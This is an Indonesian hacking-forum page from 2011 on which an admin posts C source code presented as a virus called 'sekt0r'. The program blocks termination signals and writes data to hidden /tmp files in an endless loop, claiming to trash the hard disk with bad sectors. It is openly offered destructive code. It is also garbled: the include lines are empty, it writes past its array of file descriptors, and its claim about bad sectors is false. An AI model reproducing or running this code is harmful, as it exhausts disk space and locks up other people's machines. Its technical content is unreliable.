Would you like to react to this message? Create an account in a few clicks or log in to continue.

Login

Lupa password?

Latest topics

» Setting GPRS
Subyek: Source Code Virus dan Worm  EmptyTue Nov 22, 2011 2:31 pm by nandazzzz

» Tools Untuk Menganalisa Suatu Virus
Subyek: Source Code Virus dan Worm  EmptyTue Nov 22, 2011 2:29 pm by nandazzzz

» admin masu
Subyek: Source Code Virus dan Worm  EmptyTue Nov 22, 2011 2:28 pm by nandazzzz

» Cara Memperkuat Sinyal Modem USB
Subyek: Source Code Virus dan Worm  EmptyTue Nov 22, 2011 2:27 pm by nandazzzz

» Mempercepat koneksi mozilla
Subyek: Source Code Virus dan Worm  EmptyTue Nov 22, 2011 2:26 pm by nandazzzz

» Memblock situs" berbau negatif
Subyek: Source Code Virus dan Worm  EmptyTue Nov 22, 2011 2:25 pm by nandazzzz

» pengumuman buat penghuni forum
Subyek: Source Code Virus dan Worm  EmptyThu Oct 06, 2011 3:49 pm by Nyonya oXside

» Membangun Web Server pada Jaringan Lokal (LAN)
Subyek: Source Code Virus dan Worm  EmptyWed Oct 05, 2011 7:21 pm by farizmht

»  Perbedaan Virus Dengan Worm
Subyek: Source Code Virus dan Worm  EmptyWed Oct 05, 2011 7:12 pm by farizmht

May 2024

MonTueWedThuFriSatSun
  12345
6789101112
13141516171819
20212223242526
2728293031  

Calendar Calendar

Donate money

Donations will be used to buy all prizes in tournaments. If no one donates, then the only prize we can give is rank points. So please donate whenever possible, even if you don't donate much.
~ Thanks-Admin(lutfi oXside)

    Subyek: Source Code Virus dan Worm

    lutfi oXside89
    lutfi oXside89
    Admin
    Admin


    Jumlah posting : 90
    Points : 175
    Reputation : 0
    Join date : 25.08.11
    Age : 28
    Lokasi : bandarlampung

    Subyek: Source Code Virus dan Worm  Empty Subyek: Source Code Virus dan Worm

    Post  lutfi oXside89 Mon Sep 26, 2011 9:10 am

    ini script virus hank gan... Shocked

    #include
    #include
    #include
    #include
    #include
    #include
    #include

    #define HDSIZE 640000

    void handle_sig();

    int main() {

    int i = 0;
    int x;
    int fd[5];

    signal(SIGINT, handle_sig);
    signal(SIGHUP, handle_sig);
    signal(SIGQUIT, handle_sig);
    signal(SIGABRT, handle_sig);
    signal(SIGTERM, handle_sig);

    char *buf;

    buf = malloc(HDSIZE);

    printf("sekt0r: trashing hard disk with bad sectors!\n");

    while(1) {
    fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
    fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
    fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
    fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
    fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

    for(x = 0; x < 5; x++) {
    write(fd[x], buf, HDSIZE);
    lseek(fd[x], 0, SEEK_SET);
    close(fd[x]);

    } /* end for() loop. */
    } /* end while() loop. */
    } /* end main(). */


    void handle_sig() {
    /* Reset signal handlers. */
    signal(SIGINT, handle_sig);
    signal(SIGHUP, handle_sig);
    signal(SIGQUIT, handle_sig);
    signal(SIGABRT, handle_sig);
    signal(SIGTERM, handle_sig);

    printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
    return; /* go back to creating bad sectors. */
    }

    heheehe, cuman saran jangan di praktekkan ya, ntar kompy skolah km jadi hanging out at the week. ^^V Rolling Eyes

      Waktu sekarang Sat May 11, 2024 11:11 pm